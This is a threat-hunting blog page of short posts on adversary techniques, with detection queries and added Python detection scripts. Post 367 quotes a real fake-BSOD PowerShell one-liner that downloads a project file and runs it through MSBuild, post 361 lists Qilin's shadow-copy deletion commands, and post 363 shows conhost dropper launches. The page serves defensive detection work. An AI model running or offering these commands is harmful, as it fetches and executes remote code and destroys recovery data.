Posts

367. Adversaries Use a Fake BSOD to Make the Victim Run a Malicious Command

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we're once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004). In fact, a phishing email was still involved: this time the attackers impersonated Booking.com. The email contained a link leading to a phishing website. When the victim clicked the "Refresh page" button, the browser switched to full-screen mode and displayed the familiar instruction to copy and paste a malicious command, this time cleverly disguised as a Blue Screen of Death. The command itself was also quite interesting and involved Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001):

powershell -c "start hxxps://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj"

It opens the legitimate Booking.com admin page as a decoy, recursively searches C:\ for the first msbuild.exe it can find, downloads a project file to %ProgramData%\v.proj and has MSBuild build (that is, execute) it. Detection: Pay attention to file...
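As an added example (my own code, not part of the original post), the script below dissects a pasted one-liner with the same four stages as the one above and then runs a simple parent/child check over process-creation telemetry to catch the MSBuild proxy execution it ends in. Everything in it is constructed: the command uses placeholder *.example.invalid hosts instead of the real indicators, the events are made up Sysmon-style records, and the field names (pid, ppid, image, cmdline) are assumptions about how your EDR normalises them.

```python
"""Added example for post 367 (not the author's code): dissect a pasted PowerShell
one-liner of the fake-BSOD kind and flag the MSBuild proxy execution it leads to.
Every event, path and host below is constructed; *.example.invalid are placeholders."""
from __future__ import annotations
import re

DOWNLOAD_CMDLETS = {"iwr", "invoke-webrequest", "irm", "invoke-restmethod", "curl", "wget"}
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
DROP_DIRS = ("\\programdata\\", "\\temp\\", "\\users\\public\\", "\\appdata\\")

# Constructed stand-in with the same four stages as the pasted command in the post.
PASTED_CMD = (
    'powershell -c "start https://decoy.example.invalid;'
    '$msb=(gci C:\\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;'
    'iwr https://payload.example.invalid/ -o $env:ProgramData\\v.proj;'
    '& $msb $env:ProgramData\\v.proj"'
)

def script_body(cmdline: str) -> str:
    """Return the script handed to powershell -c / -Command, without the outer quotes."""
    m = re.search(r"(?i)\s-c(?:ommand)?\s+(.*)$", cmdline)
    return m.group(1).strip().strip("\"'") if m else ""

def split_stages(body: str) -> list[str]:
    """Pasted one-liners chain their stages with ';'."""
    return [s.strip() for s in body.split(";") if s.strip()]

def classify(stage: str) -> str:
    """Label a stage: decoy page, download, locating msbuild.exe, or running a project."""
    low = stage.lower()
    first = low.split()[0] if low.split() else ""
    if first in ("start", "start-process", "saps"):
        return "decoy"
    if first in DOWNLOAD_CMDLETS:
        return "download"
    if "msbuild" in low and any(k in low for k in ("gci", "get-childitem", "where.exe")):
        return "locate_msbuild"
    if ".proj" in low and (first == "&" or "msbuild" in low):
        return "msbuild_exec"
    return "other"

def extract_iocs(stages: list[str]) -> dict:
    """URLs contacted and files written by -o/-OutFile, straight from the command text."""
    text = " ".join(stages)
    return {
        "urls": re.findall(r'https?://[^\s"\';]+', text),
        "dropped_files": re.findall(r"(?i)-o(?:utfile)?\s+(\S+)", text),
    }

def assess(cmdline: str) -> dict:
    """Stage breakdown, IOCs and a verdict for one command line."""
    stages = split_stages(script_body(cmdline))
    kinds = [classify(s) for s in stages]
    return {
        "stages": list(zip(kinds, stages)),
        "iocs": extract_iocs(stages),
        "msbuild_proxy_chain": "download" in kinds and "msbuild_exec" in kinds,
    }

# Constructed process-creation events (Sysmon event 1 style, fields trimmed, paths shortened).
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PASTED_CMD},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\ProgramData\v.proj"},
    {"pid": 4, "ppid": 1, "image": r"C:\Program Files\VS\Common7\IDE\devenv.exe", "cmdline": "devenv.exe"},
    {"pid": 5, "ppid": 4, "image": r"C:\Program Files\VS\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},  # ordinary developer build
]

def msbuild_proxy_alerts(events: list[dict]) -> list[dict]:
    """Flag msbuild.exe spawned by a scripting host or fed a project from a drop directory."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not e["image"].lower().endswith("msbuild.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        reasons = []
        if parent and parent["image"].lower().endswith(SCRIPT_HOSTS):
            reasons.append("parent is a scripting host: " + parent["image"].rsplit("\\", 1)[-1])
        if any(d in e["cmdline"].lower() for d in DROP_DIRS):
            reasons.append("project file lives in a user-writable drop directory")
        if reasons:
            alerts.append({"pid": e["pid"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    result = assess(PASTED_CMD)
    for kind, stage in result["stages"]:
        print(f"{kind:15} {stage}")
    print(result["iocs"], "proxy chain:", result["msbuild_proxy_chain"])
    print(msbuild_proxy_alerts(EVENTS))
```

The developer build from devenv.exe in the sample is deliberately left unflagged: the signal is not MSBuild itself but who launched it and where the project file lives, so tune DROP_DIRS and SCRIPT_HOSTS to your own build infrastructure before turning this into a rule.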

366. Adversaries Started to Abuse Controlio

Hello everyone! I promised to keep posting and to let you know about any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books!) shared that adversaries have started to use Controlio, a cloud-based employee monitoring and productivity analytics platform. By the way, it's not the first time adversaries have used similar tools. Another example is Rare Werewolf: the adversary leveraged Mipko Employee Monitor. Look for suspicious communications with controlio[.]net:

event_type: "dnsreqwin" AND dns_rname: "controlio.net"

Look for suspicious executions of Controlio-related binaries:

event_type: "processcreatewin" AND proc_file_productname: "controlio"

Happy hunting!

365. The Zeltser Challenge Completed

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was definitely a hard one, but still it was fun! Thank you, Dave, for motivating me to start it! Thanks to everyone who reacted to the posts and wrote kind words, it helped me a lot to finish it! It doesn't mean I'll stop posting! But I won't do it every day! Still, if I see something interesting, I'll share it with you! Thank you for reading the blog and see you next year!

364. Another RMM in a Ransomware Affiliate's Toolkit

Hello everyone! Today we'll look at another example of a very common technique, Remote Access Tools: Remote Desktop Software (T1219.002). Ransomware gangs have lots of such tools in their arsenal. For example, Power Admin's PA Server Monitor, a legitimate tool that monitors servers and applications and also provides file access auditing. Of course, it may be a good target for detection and hunting, for example:

event_type: "processcreatewin" AND proc_file_productname: "pa server monitor"

See you tomorrow!

363. That's How Arcane Werewolf Abuses Conhost

Hello everyone! We often talk about (and, of course, see) LOLBAS. So, let's look at another one that became really popular among adversaries this year. Today's example is Arcane Werewolf. The adversary leverages conhost.exe to run the dropper:

conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png

One more example, running the Loki 2.0 loader:

conhost.exe %TEMP%\chrome_proxy.pdf

As you can see, the threat actor uses quite suspicious file extensions: conhost.exe launches the command line it is given, so these "image" and "document" files are in fact executables with a misleading extension. We can use that to build a query:

event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf)

See you tomorrow!

362. Ransomware Gangs Use This Tool for Discovery

Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for File and Directory Discovery (T1083). Our example for today's post is NightSpire. Among other tools, the gang leveraged Everything, a legitimate search tool that indexes files and lets an adversary quickly understand what data is available on the compromised system. So this tool, especially if it's not widely used internally, may be a good target for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe"

See you tomorrow!

361. That's How Adversaries Manipulate Volume Shadow Copy Service

Hello everyone! It's not a secret that ransomware gangs often interact with the Volume Shadow Copy Service to Inhibit System Recovery (T1490). In most cases it's not a good target for hunting, as adversaries abuse it at the latest stages of the attack lifecycle. At the same time, they may use scripting to manipulate it, and it may be your last chance to detect malicious activity. For example, Qilin executed the following commands:

cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled

The service is started and set to Manual so that vssadmin can delete the existing shadow copies, and then stopped and set to Disabled so that no new ones are created. I'm sure you have detections for the deletion, but what about manipulating the service? So it may be a good idea to look for abuse of wmic.exe for VSS manipulation:

event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: "vss"

See you tomorrow!
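Here is an added example (my own code, not from any of the posts) that turns the hunting queries from posts 366, 364, 363, 362 and this one into Python predicates and runs them over constructed telemetry using the same field names the queries use, plus a per-host correlation for the five-step VSS sequence above. The query language's real matching rules are not documented on the page, so case-insensitive "contains" for text fields and glob matching for the *png / *pdf terms are my assumptions; the hosts, paths, product names and timestamps are all made up.

```python
"""Added example (not the author's code): the hunting queries from posts 366, 364,
363, 362 and 361 as Python predicates, run over constructed telemetry that uses the
same field names as the queries. Matching is case-insensitive 'contains' for text
fields and glob for the *png / *pdf terms; the real query language's tokenisation is
an assumption here. Hosts, paths, product names and times are made up."""
from __future__ import annotations
from fnmatch import fnmatchcase

def f(e: dict, key: str) -> str:
    """Lower-cased field value, '' when the event has no such field."""
    return str(e.get(key, "")).lower()

def is_proc(e: dict) -> bool:
    return f(e, "event_type") == "processcreatewin"

def image_name(e: dict) -> str:
    return f(e, "proc_file_path").rsplit("\\", 1)[-1]

# (rule name, post number, predicate): one rule per query on the page.
RULES = [
    ("controlio_dns", "366", lambda e: f(e, "event_type") == "dnsreqwin"
                                   and "controlio.net" in f(e, "dns_rname")),
    ("controlio_proc", "366", lambda e: is_proc(e) and "controlio" in f(e, "proc_file_productname")),
    ("pa_server_monitor", "364", lambda e: is_proc(e) and "pa server monitor" in f(e, "proc_file_productname")),
    ("conhost_odd_ext", "363", lambda e: is_proc(e) and image_name(e) == "conhost.exe"
                                   and any(fnmatchcase(f(e, "cmdline"), p) for p in ("*png", "*pdf"))),
    ("everything_exe", "362", lambda e: is_proc(e) and "everything.exe" in f(e, "proc_file_originalfilename")),
    ("wmic_vss", "361", lambda e: is_proc(e) and image_name(e) == "wmic.exe" and "vss" in f(e, "cmdline")),
]

def proc(t: int, host: str, path: str, cmdline: str, **extra) -> dict:
    """Build a constructed process-creation event; t is minutes since the hour."""
    return {"t": t, "host": host, "event_type": "processcreatewin",
            "proc_file_path": path, "cmdline": cmdline, **extra}

EVENTS = [
    proc(1, "ws01", r"C:\Windows\System32\conhost.exe", r"conhost.exe C:\Users\u\AppData\Local\Temp\icon2.png"),
    proc(2, "ws01", r"C:\Windows\System32\conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0x4"),  # normal console host
    proc(3, "ws01", r"C:\Users\u\Downloads\Everything.exe", "Everything.exe", proc_file_originalfilename="Everything.exe"),
    {"t": 4, "host": "ws01", "event_type": "dnsreqwin", "dns_rname": "app.controlio.net"},
    proc(5, "ws01", r"C:\ProgramData\agent\agent.exe", "agent.exe", proc_file_productname="Controlio"),
    proc(6, "srv01", r"C:\Program Files\PA\svc.exe", "svc.exe", proc_file_productname="PA Server Monitor"),
    proc(10, "srv01", r"C:\Windows\System32\cmd.exe", "cmd /C net start vss"),
    proc(11, "srv01", r"C:\Windows\System32\wbem\WMIC.exe", "wmic service where name='vss' call ChangeStartMode Manual"),
    proc(12, "srv01", r"C:\Windows\System32\cmd.exe", "cmd /C vssadmin.exe Delete Shadows /all /quiet"),
    proc(13, "srv01", r"C:\Windows\System32\cmd.exe", "cmd /C net stop vss"),
    proc(14, "srv01", r"C:\Windows\System32\wbem\WMIC.exe", "wmic service where name='vss' call ChangeStartMode Disabled"),
    proc(20, "ws02", r"C:\Windows\System32\wbem\WMIC.exe", "wmic os get caption"),  # benign inventory query
]

def run_rules(events: list[dict]) -> list[tuple[str, str, int, str]]:
    """(rule, post, t, host) for every event that a rule matches."""
    return [(name, post, e["t"], e["host"]) for e in events for name, post, pred in RULES if pred(e)]

def vss_sequence(events: list[dict], window: int = 10) -> list[dict]:
    """Post 361: per host, a wmic ChangeStartMode on vss plus a delete/stop within the window."""
    per_host: dict = {}
    for e in sorted(events, key=lambda e: e["t"]):
        if is_proc(e) and "vss" in f(e, "cmdline"):
            per_host.setdefault(e["host"], []).append((e["t"], f(e, "cmdline")))
    hits = []
    for host, items in per_host.items():
        modes = [t for t, c in items if "changestartmode" in c]
        stops = [t for t, c in items if "delete shadows" in c or "net stop vss" in c]
        if modes and stops and max(modes + stops) - min(modes + stops) <= window:
            hits.append({"host": host, "first": items[0][0], "last": items[-1][0], "steps": len(items)})
    return hits

if __name__ == "__main__":
    for hit in run_rules(EVENTS):
        print("rule %-18s post %s  t=%2d  %s" % hit)
    print(vss_sequence(EVENTS))
```

The single-event rules are what the page's queries express; vss_sequence is the extra step worth having for this post, because a lone wmic ChangeStartMode on vss is noisy on servers that legitimately reconfigure the service, while a mode change followed by shadow deletion or a service stop on the same host within minutes is the sequence shown above.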